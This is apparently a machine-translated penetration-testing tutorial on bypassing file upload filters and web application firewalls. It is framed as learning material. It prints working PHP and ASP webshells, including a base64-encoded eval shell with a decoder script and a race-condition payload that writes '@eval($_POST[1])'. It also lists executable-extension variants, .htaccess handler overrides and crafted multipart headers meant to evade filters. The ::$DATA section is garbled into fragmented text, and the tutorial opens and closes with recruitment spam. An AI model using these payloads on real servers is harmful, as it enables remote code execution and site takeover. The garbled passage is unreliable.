File upload bypass summary

To get more learning materials, join the community and further study, please scan my QR code or add memory2000427 to teach in good faith and take a detour.
#File upload bypass

There are two kinds: one is based on code restriction and the other is based on firewall. In fact, generally speaking, the two are similar. They both detect the legitimacy of files, but the two are different. In practical application, after information collection, with an understanding of the protective measures of a website, we can choose the upload bypass method more accurately.

(this article uses php one sentence Trojan horse as an example)

Front end JS restriction file suffix

The front end generally uses js to limit our upload type and file size. Here, take the source code of upload labs pass-01 as an example:

var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("Please select the file to upload!");
return false;
}
//Define the file types allowed to upload
var allow_ext = ".jpg|.png|.gif";
//Extract the type of uploaded file
var ext_name = file.substring(file.lastIndexOf("."));
//Judge whether the uploaded file type is allowed to be uploaded
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "This file is not allowed to be uploaded, please upload" + allow_ext + "Type of file,The current file type is:" + ext_name;
alert(errMsg);
return false;
}
}

For front-end detection, we can grab the package to modify the file type, or disable JavaScript. In short, only the front-end restriction is very unsafe and can be easily bypassed.

It is restricted that only specified suffix files can be uploaded. Bypass methods:

1. Disable JS code for detecting file suffix

2. Upload the file in normal format, and the filename of the packet capture modification file is in script format

Content type restrictions

The back-end code is roughly:

<?php
$allow_content_type = array("image/gif", "image/png", "image/jpeg");
$path = "./uploads";
$type = $_FILES["myfile"]["type"];

if (!in_array($type, $allow_content_type)) {
die("File type error!<br>
");
} else {
$file = $path . '/' . $_FILES["myfile"]["name"];
if (move_uploaded_file($_FILES["myfile"]["tmp_name"], $file)) {
echo 'Success!<br>
';
} else {
echo 'Error!<br>
';
}
}
?>

$type = $_FILES["myfile"]["type"];

1. Capture and modify content type during uploading

2. Upload the file in normal format, and the filename of the packet capture modification file is in script format

File suffix blacklist detection limit

The back-end code is roughly:

<?php
// There will be more comprehensive data in the blacklist
$blacklist = array('php', 'asp', 'aspx', 'jsp');
$path = "./uploads";
$type = array_pop(explode('.', $_FILES['myfile']['name']));

if (in_array(strtolower($type), $blacklist)) {
die("File type errer!<br>
");
} else {
$file = $path . '/' . $_FILES['myfile']['name'];
if (move_uploaded_file($_FILES['myfile']['tmp_name'], $file)) {
echo 'Success!<br>
';
} else {
echo 'Error!<br>
';
}
}
?>

$type = array_pop(explode('.', $_FILES['myfile']['name']));

2.“. ” “_” Number and space bypass, (only applicable to Windows system) under Windows system, the suffix of file name is the last "." “_” And spaces will be automatically removed. For example, the blacklist is PHP, then you can upload php.,. php_ Or PHP to bypass the blacklist, and windows will delete the last one when parsing And_ And spaces

3.:: D A T A Round too , ( only suitable use to W i n d o w s system Unified ) stay W i n d o w s of Time Wait as fruit writing piece name + " : : DATA bypass, (only applicable to Windows system) if the file name + ":: DATA bypass (only applicable to Windows system). If the file name + ":: DATA" in windows, it will put:: D A T A of after of number according to When become writing piece flow place reason , no meeting check measure after Affix name , And protect hold : : The DATA after DATA is treated as a file stream. The suffix name will not be detected, and it remains:: The DATA after DATA is treated as a file stream, the suffix will not be detected, and the file name before:: DATA is maintained

4. Double write bypass: some functions will replace sensitive file names, but you can double write bypass without recursive deletion. For example, a.phpp, PHP becomes a.php after it is replaced with empty

5.00 truncation bypass, upload a.php Jpg, add a character after PHP and modify its HEX value to 00, so that after parsing, it will be a.php and bypass the blacklist;
Common in ASP programs, JSP will also appear
PHP restrictions:
php<5.3.4
php. Magic in ini_ quotes_ GPC is set to OFF

6. Upload the resolvable extension file name, for example:

asp/aspx:
asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr

php :
php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml

jsp :
jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml

Burp fuzzy test can be used

7... htaccess and user.ini bypass blacklist

. htaccess usage conditions:

. htaccess is only applicable to apache
①,Allow Override All
②,LoadModule rewrite_module modules/mod_rewrite.so #rewrite module is on

. htaccess content:

AddType application/x-httpd-php .jpg
 Add all suffixes to.jpg File as php File parsing
<FilesMatch "BaiZe">
setHandler application/x-httpd-phpBZ
</FilesMatch>
Include all file names BaiZe File as php File parsing


.user.ini usage conditions:

AddType application/x-httpd-php .jpg
All suffixes are jpg files are parsed as php files

<FilesMatch "BaiZe">
setHandler application/x-httpd-phpBZ

Parse all files whose file names contain BaiZe as php files

File header limit

The back-end code is roughly:

<?php
$allow_mime = array("image/gif", "image/png", "image/jpeg");
$imageinfo = getimagesize($_FILES["myfile"]["tmp_name"]);
$path = "./uploads";

if (!in_array($imageinfo['mime'], $allow_mime)) {
die("File type error!<br>
");
} else {
$file = $path . '/' . $_FILES["myfile"]["name"];
if (move_uploaded_file($_FILES["myfile"]["tmp_name"], $file)) {
echo 'Success!<br>
';
} else {
echo 'Error!<br>
';
}
}
?>

File header detection, upload picture horse, and modify the suffix to resolvable script language; Or upload a sentence to the Trojan horse and add a normal format file header in the file, such as GIF89a

Hazard function detection

Generally, waf detects the contents of uploaded files

1. Use dynamic call to bypass, for example:

<?php $_GET['0']($_GET['1']);?>
This method cannot be bypassed disable_function

2. Upload the coded webshell htaccess to parse

3. Upload the encoded webshell, then upload another script file, decode the webshell and write a new file. For example, the following code is 1 php

PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=

Upload after uploading. The following is 2 php

<?php 

$path ="/xx/xxx/xx/1.php";

$str= file_get_contents($path);

$strs = base64_decode($str);

$test = fopen("./test.php","w");test
test
fwrite($test,$strs);
fclose($test);
?>

Then visit test.com after visiting PHP to get shell

WAF intercept bypass

The commonly used blacklist bypass method is also applicable to some WAFS. More importantly, it needs to be used together to successfully upload. The main idea is that the detection of receiving file name and waf is different. As long as the server can receive and analyze, it can bypass the detection of waf.

For example, 00 truncation, file name +; Number, file name + 'number, upload hatccess and user Ini, which is not repeated here. It should be used together

1. Line feed bypass detection, e.g

Content-Disposition: form-data; name="file"; filename="1.p
hp"
Content-Disposition: form-data; name="file"; file
name="1.php"
Content-Disposition: form-data; name="file"; filename=
"1.php"
All three are acceptable

2. Multiple equal signs bypass detection, e.g

Content-Disposition: form-data; name="file"; filename==="a.php"

3. Increase the file size, similar to the garbage characters injected by sql around waf, for example

Content-Disposition: form-data; aaaaaaaaaaaaaaaaaaaaa......aaaaaaaaaaaaaaaaaaaaa;name="file"; filename="a.php"

4. Remove or replace quotation marks to bypass waf

Content-Disposition: form-data; name=file1; filename=a.php
Content-Disposition: form-data; name='file1'; filename="a.php"

4. Add filename interference interception, for example

Content-Disposition: form-data; name="file"; filename= ;  filename="a.php"

5. Confuse waf matching fields, for example

Confusing form data

Content-Disposition: name="file"; filename="a.php"
remove form-data
Content-Disposition: AAAAAAAA="BBBBBBBB"; name="file";  filename="a.php"
replace form-data Is garbage value
Content-Disposition: form-data   ; name="file"; filename="a.php"
form-data Space after
Content-Disposition: for+m-data; name="file"; filename="a.php"
form-data Zhongjia+

Confuse content disposition

COntEnT-DIsposiTiOn: form-data; name="file"; filename="a.php"
Case confusion
Content-Type: image/gif
Content-Disposition: form-data; name="file";  filename="a.php"
Exchange Content-Type and ConTent-Disposition Order of
Content-Type: image/gif
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
 Add extra head
AAAAAAAA:filename="aaa.jpg";
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
 Add extra head
Content-Length: 666
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
 Add extra head

6. Double file bypass. For example, the security dog always takes the value in the last content disposition as the receiving parameter for detection. Some middleware, such as IIS6 0 always takes the value in the first content disposition as the receiving parameter.

7. The container is inconsistent with WAF's requirements for Boundary

Content-Type: multipart/form-data; boundary=---------------------------471****1141173****525****99
Content-Length: 253
-----------------------------471****1141173****525****99
Content-Disposition: form-data; name="file1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("a")%>
-----------------------------471****1141173****525****99--

Some WAF S will think that the inconsistent data of the two Boundary sections is meaningless and will not be detected, while the container is not strictly required to receive data normally.

8. Conditional competition. In some cases, when uploading files, first upload them to the temporary directory, then detect them, and then delete them. For example, you can upload files that generate a one sentence Trojan horse

fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');

If you access this file while uploading, you may generate a webshell file a.php before the file is deleted

To get more learning materials, join the community and learn more, please scan my QR code or add memory2000427.

Keywords: Web Development security Cyber Security penetration test

Added by simon551 on Sun, 30 Jan 2022 01:45:28 +0200